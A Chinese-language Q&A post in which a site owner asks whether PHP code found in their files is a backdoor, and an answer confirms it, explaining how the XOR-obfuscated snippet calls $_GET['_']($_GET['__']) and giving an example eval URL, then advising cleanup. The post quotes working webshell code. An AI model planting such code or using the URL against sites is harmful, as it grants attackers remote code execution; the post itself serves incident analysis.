php - 那是某种 PHP 后门吗

Question

您好，我在我的网站文件中发现了这段代码，这是某种后门吗？有人可以逐行解释这段代码吗

 <? $_="{";
 $_=($_^"<").($_^">").($_^"/");?>
 <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

Answer 1

是的，这是恶意代码。

在花任何时间查看它之前，您应该立即使该站点脱机并用已知良好的副本替换它，例如备份或官方版本。您还应该确保您服务器上的所有内容都是最新的并更改您的管理员密码。该代码存在的事实意味着您的代码已经被破坏。

为了确认我没有过于夸张，下面是代码的工作原理:

• 前两行生成一个包含字母 'GET' 的字符串通过使用 bitwise XOR operations .
• 然后第三行添加一个'_'一开始，执行$_GET["_"]($_GET["__"]); , 用 <?= 回应结果
• 这允许攻击者访问包含 _ 查询字符串的页面是函数名，__是它的参数； PHP 将运行该函数并显示结果。
• 这反过来又允许他们运行他们喜欢的任何代码，因为他们可以直接转到 `/yourcompromisedpage.php?_=eval&__=anyPHPcodeatall();

但重申一下，以上只是为了满足好奇心；在这种情况下，您应该“先拍摄，然后再提问”。一旦您确定代码不应该存在，假设您已被入侵。